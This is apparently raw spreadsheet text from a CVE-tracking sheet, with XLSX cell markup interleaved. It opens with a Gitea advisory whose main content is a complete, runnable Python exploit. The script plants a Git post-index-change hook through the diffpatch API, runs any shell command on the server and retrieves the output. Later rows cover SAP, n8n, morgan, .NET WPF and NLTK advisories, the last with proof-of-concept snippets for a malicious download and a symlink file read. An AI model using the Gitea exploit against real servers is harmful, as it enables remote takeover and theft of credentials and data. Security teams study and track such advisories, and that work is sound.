An attacker with ordinary write access to a repository can execute arbitrary shell commands as the Gitea OS user. With default open registration, an unauthenticated visitor can obtain the required write access by registering an account and creating a repository.

### Details

`services/repository/files/patch.go` applies attacker-controlled patches in a shared bare temporary clone:

```go
cmdApply := gitcmd.NewCommand("apply", "--index", "--recount", "--cached", "--binary")
if git.DefaultFeatures().CheckVersionAtLeast("2.32") {
    cmdApply.AddArguments("-3")
}
````

Submitting the same patch twice creates an add/add collision. Git's three-way fallback checks the indexed path out even though the operation is performed with `--cached`.

In a bare clone, the repository root is `$GIT_DIR`. As a result, an executable entry named:

```text
hooks/post-index-change
```

becomes a live Git hook.

Git invokes the hook while writing the index, allowing repository-controlled content to execute arbitrary commands as the Gitea service account.

The hook's return value is not propagated to the `diffpatch` response.

The attached PoC stores command output in Git objects and creates a branch containing the result, so no outbound connection is required. The result is fetched through authenticated smart HTTP.

### PoC

The supplied `gitea_diffpatch_rce_poc.py` uses an existing Gitea account. Run it against a test instance where the account can create a repository.

Set the account password:

```bash
export GITEA_PASSWORD='account-password'
```

Execute a command through the `diffpatch` chain:

```bash
python3 ./gitea_diffpatch_rce_poc.py \
  https://gitea.example \
  pocuser \
  'id; uname -srm; pwd'
```

The script:

* Creates an initialized private repository.
* Submits the same executable-hook patch twice.
* Fetches the result branch.
* Prints the command's combined stdout, stderr, and exit status.
* Prints the evidence repository, ref, and commit IDs to stderr.

Expected output resembles:

```text
uid=1000(git) gid=1000(git) groups=1000(git)
Linux ...
/data/gitea/tmp/...

[exit-status=0]
```

The trigger requires:

* Git 2.32 or newer.
* An enabled `diffpatch` route.
* A writable and executable temporary filesystem.

Open registration is required only for the no-prior-credentials attack path.

### Impact

This is remote command execution as the Gitea service account (`CWE-94`).

Depending on deployment isolation and the privileges of the Gitea OS user, successful exploitation may expose:

* `app.ini` and Gitea application secrets.
* Process environment secrets.
* Mounted repositories.
* Database credentials and database contents.
* OAuth and integration credentials.
* Other internal or externally reachable services.

With open registration enabled, the attack can be performed by an unauthenticated visitor after registering a normal account and creating a repository.


&lt;img width="928" height="687" alt="Screenshot 2026-07-25 at 14 45 44" src="https://github.com/user-attachments/assets/e7ce9fe7-bcab-4539-82fc-14c3856bda1c" /&gt;




```python
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Gitea RCE PoC – authorized testing only.
"""

from __future__ import annotations

import argparse
import base64
import getpass
import hashlib
import json
import os
from pathlib import Path

import secrets
import shlex
import shutil
import subprocess
import sys
import tempfile

from typing import Any
import urllib.error
import urllib.parse
import urllib.request


TIMEOUT    = 30.0
USER_AGENT = "gitea-rce-poc/2.0"

_RST  = "\033[0m"
_DIM  = "\033[2m"
_GRN  = "\033[38;5;46m"     # bright green
_RED  = "\033[31m"           # red for errors

def _g(t: str) -&gt; str: return f"{_GRN}{t}{_RST}"
def _r(t: str) -&gt; str: return f"{_RED}{t}{_RST}"
def _d(t: str) -&gt; str: return f"{_DIM}{t}{_RST}"

def log_star(msg: str) -&gt; None: print(f"{_g('[*]')} {_d(msg)}")
def log_ok  (msg: str) -&gt; None: print(f"{_g('[+]')} {_g(msg)}")
def log_err (msg: str) -&gt; None: print(f"{_r('[-]')} {_r(msg)}")


_SEP = "  " + "═" * 44
BANNER = f"{_SEP}\n  GITEA  REMOTE CODE EXECUTION  POC\n{_SEP}"

def print_banner(url: str, version: str | None = None,
                 command: str | None = None) -&gt; None:
    print()
    for line in BANNER.splitlines():
        print(_g(line))
    print()
    ver = version or "unknown"
    print(_g("  " + "-" * 54))
    print(_g(f"  Target        : {url}"))
    print(_g(f"  Version       : {ver}"))
    if command:
        print(_g(f"  Command       : {command}"))
    print(_g("  " + "-" * 54))
    print()

class PocError(RuntimeError):
    pass

class GiteaClient:
    def __init__(self, base_url: str, username: str, password: str) -&gt; None:
        parsed = urllib.parse.urlsplit(base_url)
        if parsed.scheme not in {"http", "https"} or not parsed.netloc:
            raise PocError("URL must be an absolute http:// or https:// URL")
        if parsed.query or parsed.fragment:
            raise PocError("URL must not contain a query string or fragment")
        self.base_url = base_url.rstrip("/")
        self.username = username
        self.password = password
        encoded = base64.b64encode(
            f"{username}:{password}".encode()
        ).decode("ascii")
        self.authorization = f"Basic {encoded}"

    def api(
        self,
        method: str,
        path: str,
        payload: dict[str, Any] | None = None,
    ) -&gt; tuple[int, Any]:
        data = None
        if payload is not None:
            data = json.dumps(payload, separators=(",", ":")).encode()
        req = urllib.request.Request(
            self.base_url + path,
            data=data,
            method=method,
            headers={
                "Accept": "application/json",
                "Authorization": self.authorization,
                "Content-Type": "application/json",
                "User-Agent": USER_AGENT,
            },
        )
        try:
            with urllib.request.urlopen(req, timeout=TIMEOUT) as r:
                raw = r.read()
                return r.status, json.loads(raw) if raw else None
        except urllib.error.HTTPError as exc:
            body = exc.read().decode("utf-8", errors="replace")[:2_000]
            raise PocError(f"{method} {path} → HTTP {exc.code}: {body}") from exc
        except urllib.error.URLError as exc:
            raise PocError(f"{method} {path} failed: {exc.reason}") from exc
        except json.JSONDecodeError:
            raise PocError(f"{method} {path} returned invalid JSON")

def blob_oid(content: bytes) -&gt; str:
    return hashlib.sha1(
        f"blob {len(content)}\0".encode("ascii") + content
    ).hexdigest()

def build_hook(command: str, leak_ref: str) -&gt; bytes:
    qcmd = shlex.quote(command)
    qref = shlex.quote(f"refs/heads/{leak_ref}")
    return (
        "#!/bin/sh\n"
        'git_dir=$(git rev-parse --absolute-git-dir) || exit 1\n'
        'origin_objects=$(sed -n "1p" "$git_dir/objects/info/alternates") || exit 2\n'
        'case "$origin_objects" in\n'
        '  /*) ;;\n'
        '  *) origin_objects="$git_dir/objects/$origin_objects" ;;\n'
        "esac\n"
        'origin_git=${origin_objects%/objects}\n'
        '[ "$origin_git" != "$origin_objects" ] || exit 3\n'
        f"output_blob=$({{ /bin/sh -c {qcmd}; "
        'command_status=$?; printf "\\n[exit-status=%s]\\n" "$command_status"; } 2&gt;&amp;1 | '
        'git --git-dir="$origin_git" hash-object -w --stdin) || exit 4\n'
        'tree=$(printf "100644 blob %s\\toutput\\n" "$output_blob" | '
        'git --git-dir="$origin_git" mktree) || exit 5\n'
        'commit=$(printf "command output\\n" | '
        "GIT_AUTHOR_NAME=poc GIT_AUTHOR_EMAIL=poc@example.invalid "
        "GIT_COMMITTER_NAME=poc GIT_COMMITTER_EMAIL=poc@example.invalid "
        'git --git-dir="$origin_git" commit-tree "$tree") || exit 6\n'
        f'git --git-dir="$origin_git" update-ref {qref} "$commit" || exit 7\n'
        "exit 0\n"
    ).encode()

def build_patch(hook: bytes) -&gt; str:
    lc  = hook.count(b"\n")
    hdr = (
        "diff --git a/hooks/post-index-change b/hooks/post-index-change\n"
        "new file mode 100755\n"
        f"index {'0'*40}..{blob_oid(hook)}\n"
        "--- /dev/null\n"
        "+++ b/hooks/post-index-change\n"
        f"@@ -0,0 +1,{lc} @@\n"
    ).encode()
    return (hdr + b"".join(b"+" + l for l in hook.splitlines(keepends=True))).decode()

def run_git(git: str, arguments: list[str], env: dict[str, str]) -&gt; bytes:
    try:
        result = subprocess.run(
            [git, *arguments], env=env,
            stdin=subprocess.DEVNULL,
            stdout=subprocess.PIPE, stderr=subprocess.PIPE,
            check=False, timeout=TIMEOUT,
        )
    except subprocess.TimeoutExpired as exc:
        raise PocError(f"git timed out after {TIMEOUT:g}s") from exc
    except OSError as exc:
        raise PocError(f"could not run git: {exc}") from exc
    if result.returncode != 0:
        err = result.stderr.decode("utf-8", errors="replace")[:2_000].strip()
        raise PocError(f"git exit {result.returncode}: {err}")
    return result.stdout

def fetch_output(git: str, client: GiteaClient,
                 owner: str, repo: str, leak_ref: str) -&gt; bytes:
    remote = (
        f"{client.base_url}/"
        f"{urllib.parse.quote(owner, safe='')}/"
        f"{urllib.parse.quote(repo, safe='')}.git"
    )
    with tempfile.TemporaryDirectory(prefix="gitea-poc-") as tmp:
        bare      = Path(tmp) / "fetch.git"
        auth_cfg  = Path(tmp) / "auth.config"
        fd = os.open(auth_cfg, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o600)
        with os.fdopen(fd, "w", encoding="utf-8") as f:
            f.write(f"[http]\n\textraHeader = Authorization: {client.authorization}\n")
        env = {**os.environ, "GIT_TERMINAL_PROMPT": "0"}
        run_git(git, ["init", "--bare", "--quiet", str(bare)], env)
        run_git(git, [
            "-C", str(bare), "-c", f"include.path={auth_cfg}",
            "fetch", "--quiet", "--no-tags",
            remote, f"refs/heads/{leak_ref}",
        ], env)
        return run_git(git, ["-C", str(bare), "show", "FETCH_HEAD:output"], env)

def split_output(raw: bytes) -&gt; tuple[str, int | None]:
    text  = raw.decode("utf-8", errors="replace")
    lines = text.splitlines()
    status: int | None = None
    if lines:
        t = lines[-1].strip()
        if t.startswith("[exit-status=") and t.endswith("]"):
            try:    status = int(t[len("[exit-status="):-1])
            except ValueError: pass
            else:   lines.pop()
    return "\n".join(lines).rstrip("\n"), status


def parse_args() -&gt; argparse.Namespace:
    p = argparse.ArgumentParser(description="Gitea RCE PoC")
    p.add_argument("url",      help="Gitea base URL")
    p.add_argument("username", help="existing Gitea username")
    p.add_argument("command",  help="shell command to execute on target")
    return p.parse_args()


def main() -&gt; int:
    args = parse_args()
    if "\0" in args.command:
        raise PocError("command must not contain a NUL character")

    password = os.environ.get("GITEA_PASSWORD") or getpass.getpass(
        _g("[?]") + " password: "
    )
    if not password:
        raise PocError("password must not be empty")

    git = shutil.which("git")
    if git is None:
        raise PocError("git executable not found in PATH")

    client = GiteaClient(args.url, args.username, password)

    # version probe (pre-banner)
    log_star("probing target...")
    version: str | None = None
    try:
        r = urllib.request.Request(
            client.base_url + "/api/v1/version",
            headers={"Accept": "application/json", "User-Agent": USER_AGENT},
        )
        with urllib.request.urlopen(r, timeout=TIMEOUT) as resp:
            version = json.loads(resp.read()).get("version", "unknown")
    except Exception:
        version = "unknown"
    print_banner(client.base_url, version, args.command)

    log_star(f"target={client.base_url}  user={args.username}  cmd={args.command}")
    print()

    # step 1 – authenticate
    log_star("authenticating...")
    sc, acct = client.api("GET", "/api/v1/user")
    if sc != 200 or not isinstance(acct, dict):
        log_err("authentication failed"); raise PocError("auth failed")
    owner = acct.get("login")
    if not isinstance(owner, str) or not owner:
        log_err("no login in response"); raise PocError("no login")
    log_ok(f"logged in as {owner}  ({version})")

    # step 2 – create repo
    unique   = secrets.token_hex(5)
    repo     = f"test-repo-{unique}"
    leak_ref = f"output-{unique}"
    log_star("creating repository...")
    sc, _ = client.api("POST", "/api/v1/user/repos", {
        "name": repo, "private": True,
        "auto_init": True, "default_branch": "main",
        "object_format_name": "sha1",
    })
    if sc != 201:
        log_err("repo creation failed"); raise PocError("repo creation failed")
    log_ok(f"created repo {owner}/{repo}")

    # steps 3–4 – deliver payloads
    body = {
        "content": build_patch(build_hook(args.command, leak_ref)),
        "message": "initial commit",
        "branch": "main", "new_branch": "main",
    }
    ep = (
        f"/api/v1/repos/{urllib.parse.quote(owner, safe='')}/"
        f"{urllib.parse.quote(repo, safe='')}/diffpatch"
    )
    commits: list[str] = []
    for cycle in (1, 2):
        log_star(f"delivering payload {cycle}/2...")
        sc, resp = client.api("POST", ep, body)
        try:
            commit = resp["commit"]["sha"]
        except (KeyError, TypeError) as exc:
            log_err(f"payload {cycle}/2 rejected")
            raise PocError(f"cycle {cycle} no commit") from exc
        if sc != 201:
            log_err(f"payload {cycle}/2 failed")
            raise PocError(f"cycle {cycle} failed")
        commits.append(commit)
        log_ok(f"payload {cycle}/2 accepted  commit={commit[:16]}")

    # step 5 – retrieve output
    log_star("retrieving output...")
    output = fetch_output(git, client, owner, repo, leak_ref)
    log_ok("operation complete")

    # command output
    cmd_out, exit_status = split_output(output)
    print()
    log_ok(f"{args.command}:")
    print(_g("---"))
    if cmd_out:
        for line in cmd_out.splitlines():
            print(_g(line))
    else:
        print(_d("&lt;no output&gt;"))
    print(_g("---"))
    if exit_status == 0:
        log_ok(f"exit status: {exit_status}")
    elif exit_status is None:
        log_star("exit status: unknown")
    else:
        log_err(f"exit status: {exit_status}")

    return 0


if __name__ == "__main__":
    try:
        raise SystemExit(main())
    except PocError as exc:
        log_err(str(exc))
        raise SystemExit(1) from None

```</t></is></c><c r="T2" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-60004</t></is></c></row><row r="3"><c r="A3" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B3" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C3" s="5" t="inlineStr"><is><t>CVE-2026-76969</t></is></c><c r="D3" s="5" t="n"><v>9.4</v></c><c r="E3" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F3" s="5" t="inlineStr"><is><t>cna@sap.com</t></is></c><c r="G3" s="5" t="inlineStr" /><c r="H3" s="5" t="n"><v>0.003</v></c><c r="I3" s="5" t="inlineStr" /><c r="J3" s="5" t="inlineStr"><is><t>sap</t></is></c><c r="K3" s="5" t="inlineStr" /><c r="L3" s="5" t="inlineStr"><is><t>npm:@sap/cds-mtxs</t></is></c><c r="M3" s="5" t="inlineStr"><is><t>1.18.4, 2.7.7, 3.9.7, 4.0.3</t></is></c><c r="N3" s="5" t="inlineStr"><is><t>GHSA, NVD, OSV</t></is></c><c r="O3" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P3" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q3" s="5" t="inlineStr" /><c r="R3" s="5" t="inlineStr"><is><t>CWE-522</t></is></c><c r="S3" s="5" t="inlineStr"><is><t>@sap/cds-mtxs NPM library does not perform sufficient checks on certain functionality used in multitenant CAP applications with extensibility enabled. An unauthenticated attacker could send specially crafted requests to obtain sensitive credentials and abuse them to replace or delete tenant data. Successful exploitation can result in a high impact on availability and integrity of the application. There may also be partial impact to the confidentiality of business data.</t></is></c><c r="T3" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76969</t></is></c></row><row r="4"><c r="A4" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B4" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C4" s="5" t="inlineStr"><is><t>CVE-2026-86996</t></is></c><c r="D4" s="5" t="n"><v>5.4</v></c><c r="E4" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F4" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G4" s="5" t="inlineStr" /><c r="H4" s="5" t="n"><v>0.002</v></c><c r="I4" s="5" t="inlineStr" /><c r="J4" s="5" t="inlineStr" /><c r="K4" s="5" t="inlineStr"><is><t>n8n:n8n</t></is></c><c r="L4" s="5" t="inlineStr"><is><t>npm:n8n</t></is></c><c r="M4" s="5" t="inlineStr"><is><t>2.37.7, 2.38.2</t></is></c><c r="N4" s="5" t="inlineStr"><is><t>GHSA, NVD, OSV</t></is></c><c r="O4" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P4" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q4" s="5" t="inlineStr" /><c r="R4" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S4" s="5" t="inlineStr"><is><t>n8n is an open source workflow automation platform. Prior to 2.37.7 and 2.38.2, the workflow setting named This workflow can be called by was enforced by the Execute Workflow node but not when a workflow was attached to an Agent as a tool. A user able to build an Agent could invoke a restricted workflow and read its returned data. The affected path is packages/cli/src/modules/agents/tools/workflow-tool-factory.ts, where executeWorkflow omitted SubworkflowPolicyChecker.checkForProject. This issue is fixed in versions 2.37.7 and 2.38.2.</t></is></c><c r="T4" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86996</t></is></c></row><row r="5"><c r="A5" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B5" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C5" s="5" t="inlineStr"><is><t>CVE-2026-12259</t></is></c><c r="D5" s="5" t="inlineStr" /><c r="E5" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F5" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G5" s="5" t="inlineStr" /><c r="H5" s="5" t="n"><v>0.001</v></c><c r="I5" s="5" t="inlineStr" /><c r="J5" s="5" t="inlineStr" /><c r="K5" s="5" t="inlineStr" /><c r="L5" s="5" t="inlineStr"><is><t>PyPI:nltk</t></is></c><c r="M5" s="5" t="inlineStr"><is><t>3.9.3</t></is></c><c r="N5" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O5" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P5" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q5" s="5" t="inlineStr" /><c r="R5" s="5" t="inlineStr" /><c r="S5" s="5" t="inlineStr"><is><t>NLTK's package downloader in nltk/downloader.py does not verify file integrity after download and before extraction.

The download flow at lines 789-825:
1. File is downloaded to a temp path via HTTP
2. os.replace(tmp_filepath, filepath) moves it to the final location (line 799)
3. Extraction begins via _unzip_iter() (line 825)

Between steps 2 and 3, there is no SHA-256 verification. The checksum logic exists in _pkg_status() (lines 982-1015) but it is only used BEFORE download as a status check ("is this package already installed and up-to-date?"). It is never called after download to verify the file that was actually received.

Attack vectors:
1. MITM during HTTP download (NLTK downloads from http:// by default on some mirrors)
2. Race condition on shared filesystems (attacker replaces file between os.replace and _unzip_iter)
3. DNS poisoning redirecting to attacker-controlled server

PoC:
```python
import nltk
import unittest.mock
import zipfile
import io
import os

# Create a malicious zip that will be "downloaded"
malicious_zip = io.BytesIO()
with zipfile.ZipFile(malicious_zip, 'w') as zf:
    zf.writestr('punkt_tab/tokenizers/punkt_tab/english.pickle', 
                b'MALICIOUS PAYLOAD - attacker controlled content')

# Patch urllib to return our malicious zip
with unittest.mock.patch('urllib.request.urlopen') as mock_urlopen:
    mock_response = unittest.mock.MagicMock()
    mock_response.read.return_value = malicious_zip.getvalue()
    mock_response.headers = {'Content-Length': str(len(malicious_zip.getvalue()))}
    mock_urlopen.return_value = mock_response
    
    # Download proceeds, no integrity check catches the swap
    # nltk.download('punkt_tab')  # Would install attacker payload
```

This is distinct from CVE-2024-39705 (pickle deserialization via download) and CVE-2025-14009 (zip-slip path traversal). Those address what happens AFTER extraction. This finding addresses the gap BEFORE extraction where integrity is never verified.

Suggested fix: After os.replace() and before _unzip_iter(), compute SHA-256 of the final file and compare against the expected checksum from the package index. Reject and delete the file if the hash does not match.</t></is></c><c r="T5" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-12259</t></is></c></row><row r="6"><c r="A6" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B6" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C6" s="5" t="inlineStr"><is><t>CVE-2026-15603</t></is></c><c r="D6" s="5" t="inlineStr" /><c r="E6" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F6" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G6" s="5" t="inlineStr" /><c r="H6" s="5" t="n"><v>0.002</v></c><c r="I6" s="5" t="inlineStr" /><c r="J6" s="5" t="inlineStr" /><c r="K6" s="5" t="inlineStr" /><c r="L6" s="5" t="inlineStr"><is><t>npm:morgan</t></is></c><c r="M6" s="5" t="inlineStr"><is><t>1.12.0</t></is></c><c r="N6" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O6" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P6" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q6" s="5" t="inlineStr" /><c r="R6" s="5" t="inlineStr" /><c r="S6" s="5" t="inlineStr"><is><t>### Impact

Morgan writes attacker-controlled request data to the access log through its tokens. The 1.11.0 fix neutralizes C0 control characters, DEL, and backslash, but it does not escape the Unicode line separators `U+0085` (NEL), `U+2028` (LINE SEPARATOR), or `U+2029` (PARAGRAPH SEPARATOR). These code points are reachable through several tokens, including the request URL (`:url`), request headers such as `:user-agent` and `:referrer`, arbitrary `:req[header]` values, and the Basic auth username (`:remote-user`). NEL is valid `obs-text` in HTTP header values, so an attacker can place it in an ordinary request header.

When such a value is logged, the raw code points survive into the emitted access-log record, and downstream ECMAScript-aware or Unicode-aware log processing splits the single physical record into multiple logical records. This allows an attacker to forge log entries. The built-in `combined`, `common`, `default`, and `short` formats are affected, as well as any custom format. This is an incomplete fix of CVE-2026-5078.

### Patches

Users should upgrade to version 1.12.0.

### Workarounds

None. The affected values include the request URL and request headers, which are core to access logging, so there is no practical format-based mitigation. Upgrade to 1.12.0.</t></is></c><c r="T6" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-15603</t></is></c></row><row r="7"><c r="A7" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B7" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C7" s="5" t="inlineStr"><is><t>CVE-2026-50646</t></is></c><c r="D7" s="5" t="inlineStr" /><c r="E7" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F7" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G7" s="5" t="inlineStr" /><c r="H7" s="5" t="n"><v>0.01</v></c><c r="I7" s="5" t="inlineStr" /><c r="J7" s="5" t="inlineStr" /><c r="K7" s="5" t="inlineStr" /><c r="L7" s="5" t="inlineStr"><is><t>NuGet:Microsoft.WindowsDesktop.App.Runtime.win-arm64, NuGet:Microsoft.WindowsDesktop.App.Runtime.win-x64, NuGet:Microsoft.WindowsDesktop.App.Runtime.win-x86</t></is></c><c r="M7" s="5" t="inlineStr"><is><t>10.0.10, 8.0.29, 9.0.18</t></is></c><c r="N7" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O7" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P7" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q7" s="5" t="inlineStr" /><c r="R7" s="5" t="inlineStr" /><c r="S7" s="5" t="inlineStr"><is><t>## Executive summary

Microsoft is releasing this security advisory to provide information about a vulnerability in Windows Presentation Foundation (WPF). This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability.

A remote code execution vulnerability exists in Windows Presentation Foundation (WPF) in .NET 8, .NET 9, and .NET 10 when parsing specially crafted XAML input. An attacker who successfully exploits this vulnerability could execute arbitrary code in the context of the current user.

## Announcement

Announcement for this issue can be found at https://github.com/dotnet/announcements/issues/**TBD**

## CVSS Details

- **Version:** 3.1
- **Severity:** High
- **Score:** 7.8
- **Vector:** `CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H`
- **Weakness:** CWE-693 (Protection Mechanism Failure)

## Affected Platforms

- **Platforms:** Windows
- **Architectures:** All

## &lt;a name="affected-packages"&gt;&lt;/a&gt;Affected Packages
The vulnerability affects any Microsoft .NET project if it uses any of affected package versions listed below

### &lt;a name=".NET 10.0"&gt;&lt;/a&gt;.NET 10.0
Package name | Affected version | Patched version
------------ | ---------------- | -------------------------
[Microsoft.WindowsDesktop.App.Runtime.win-arm64](https://www.nuget.org/packages/Microsoft.WindowsDesktop.App.Runtime.win-arm64)               | &gt;= 10.0.0, &lt;= 10.0.9 | 10.0.10
[Microsoft.WindowsDesktop.App.Runtime.win-x64](https://www.nuget.org/packages/Microsoft.WindowsDesktop.App.Runtime.win-x64)               | &gt;= 10.0.0, &lt;= 10.0.9 | 10.0.10
[Microsoft.WindowsDesktop.App.Runtime.win-x86](https://www.nuget.org/packages/Microsoft.WindowsDesktop.App.Runtime.win-x86)               | &gt;= 10.0.0, &lt;= 10.0.9 | 10.0.10

### &lt;a name=".NET 9.0"&gt;&lt;/a&gt;.NET 9.0
Package name | Affected version | Patched version
------------ | ---------------- | -------------------------
[Microsoft.WindowsDesktop.App.Runtime.win-arm64](https://www.nuget.org/packages/Microsoft.WindowsDesktop.App.Runtime.win-arm64)               | &gt;= 9.0.0, &lt;= 9.0.17 | 9.0.18
[Microsoft.WindowsDesktop.App.Runtime.win-x64](https://www.nuget.org/packages/Microsoft.WindowsDesktop.App.Runtime.win-x64)               | &gt;= 9.0.0, &lt;= 9.0.17 | 9.0.18
[Microsoft.WindowsDesktop.App.Runtime.win-x86](https://www.nuget.org/packages/Microsoft.WindowsDesktop.App.Runtime.win-x86)               | &gt;= 9.0.0, &lt;= 9.0.17 | 9.0.18

### &lt;a name=".NET 8.0"&gt;&lt;/a&gt;.NET 8.0
Package name | Affected version | Patched version
------------ | ---------------- | -------------------------
[Microsoft.WindowsDesktop.App.Runtime.win-arm64](https://www.nuget.org/packages/Microsoft.WindowsDesktop.App.Runtime.win-arm64)               | &gt;= 8.0.0, &lt;= 8.0.28 | 8.0.29
[Microsoft.WindowsDesktop.App.Runtime.win-x64](https://www.nuget.org/packages/Microsoft.WindowsDesktop.App.Runtime.win-x64)               | &gt;= 8.0.0, &lt;= 8.0.28 | 8.0.29
[Microsoft.WindowsDesktop.App.Runtime.win-x86](https://www.nuget.org/packages/Microsoft.WindowsDesktop.App.Runtime.win-x86)               | &gt;= 8.0.0, &lt;= 8.0.28 | 8.0.29

## Advisory FAQ

### &lt;a name="how-affected"&gt;&lt;/a&gt;How do I know if I am affected?

If using a package listed in [affected packages](#affected-packages), developers exposed to the vulnerability.

### &lt;a name="how-fix"&gt;&lt;/a&gt;How do I fix the issue?

1. To fix the issue please install the latest version of .NET. If developers have installed one or more .NET SDKs through Visual Studio, Visual Studio will prompt them to update Visual Studio, which will also update their .NET SDKs.
2. If their application references the vulnerable nuget package, update the package reference to the patched version. Developers can list the versions they have installed by running the `dotnet --info` command.

Once developers have installed the updated runtime or SDK, they should restart their apps for the update to take effect.

Additionally, if they've deployed [self-contained applications](https://docs.microsoft.com/dotnet/core/deploying/#self-contained-deployments-scd) targeting any of the impacted versions, these applications are also vulnerable and must be recompiled and redeployed.

## Other Information

### Reporting Security Issues

If anyone has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Direct questions about this issue to GitHub in the .NET GitHub organization. The main repos are located at https://github.com/dotnet/runtime. The Announcements repo (https://github.com/dotnet/Announcements) will contain this bulletin as an issue and will include a link to a discussion issue. Users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[CVE-2026-50646]( https://www.cve.org/CVERecord?id=CVE-2026-50646)

### Acknowledgements

Kevin Gosse, 41ae55e9310ff27fa6f26af4727e5590, Ky0toFu

### Revisions

V1.0 (July 14, 2026): Advisory published.</t></is></c><c r="T7" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-50646</t></is></c></row><row r="8"><c r="A8" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B8" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C8" s="5" t="inlineStr"><is><t>CVE-2026-62383</t></is></c><c r="D8" s="5" t="inlineStr" /><c r="E8" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F8" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G8" s="5" t="inlineStr" /><c r="H8" s="5" t="n"><v>0.002</v></c><c r="I8" s="5" t="inlineStr" /><c r="J8" s="5" t="inlineStr" /><c r="K8" s="5" t="inlineStr" /><c r="L8" s="5" t="inlineStr"><is><t>PyPI:nltk</t></is></c><c r="M8" s="5" t="inlineStr"><is><t>3.10.2</t></is></c><c r="N8" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O8" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P8" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q8" s="5" t="inlineStr" /><c r="R8" s="5" t="inlineStr" /><c r="S8" s="5" t="inlineStr"><is><t>## Summary

`IPIPANCorpusReader` (`nltk/corpus/reader/ipipan.py`) exposes public methods, `channels()`, `domains()`, `categories()`, and `fileids(channels=...)`, that accept a caller supplied `fileids` list and read a file via a completely unprotected builtin `open()` call, with no `nltk.pathsec` involvement at all. A symlink placed inside the corpus root, with a name containing no separators or `..`, passes NLTK's existing traversal checks and is opened directly, reading a file from anywhere on the filesystem the process can access.

## Root cause

All four methods route through `_get_tag()`:

```python
def _get_tag(self, f, tag):
    tags = []
    with open(f) as infile:   # builtin open(), no pathsec involvement
        header = infile.read()
    ...
```

`f` arrives via `_list_header_files()` / `_list_morph_files_by()`, both of which call:

```python
f.replace("morph.xml", "header.xml")
```

on the result of `self.abspath(...)` or `self.abspaths(...)`. `FileSystemPathPointer` subclasses `str`, so `.replace()` returns a plain Python string, silently discarding the `PathPointer` wrapper. That plain string is handed straight to builtin `open()`.

This is a more severe variant of the same CWE-59 class already fixed elsewhere in this codebase (`CorpusReader.open()`, `NKJPCorpusReader.add_root()`, and the recent `FramenetCorpusReader` fix): those route file access through `nltk.pathsec.validate_path()`, at minimum the global, non-scoped check, before opening. Here, converting the `PathPointer` to a plain string before calling `open()` skips `pathsec` completely, not just the corpus-root-scoped check, so the symlink target does not even need to land under a registered `nltk.data.path` root.

Plain literal `../` traversal in the fileid is still blocked by `FileSystemPathPointer.join()`, so this is specifically the symlink variant, not a regression of the older, simpler traversal class.

## Proof of concept

Constructed the normal, documented way, `fileids` as a regex over file paths, so the reader auto-discovers whatever `.xml` files exist in its root with no special knowledge of the planted symlink.

```python
import os
import tempfile

from nltk.corpus.reader.ipipan import IPIPANCorpusReader

root = tempfile.mkdtemp()
corpus_root = os.path.join(root, "ipipan")
os.makedirs(corpus_root)

with open(os.path.join(corpus_root, "real_morph.xml"), "w") as f:
    f.write("&lt;channel&gt;legit&lt;/channel&gt;")

secret_dir = os.path.join(root, "outside_ipipan_root")
os.makedirs(secret_dir)
secret_path = os.path.join(secret_dir, "stolen.xml")
with open(secret_path, "w") as f:
    f.write("&lt;channel&gt;TOP-SECRET-CHANNEL-DATA-FROM-OUTSIDE-CORPUS-ROOT&lt;/channel&gt;")

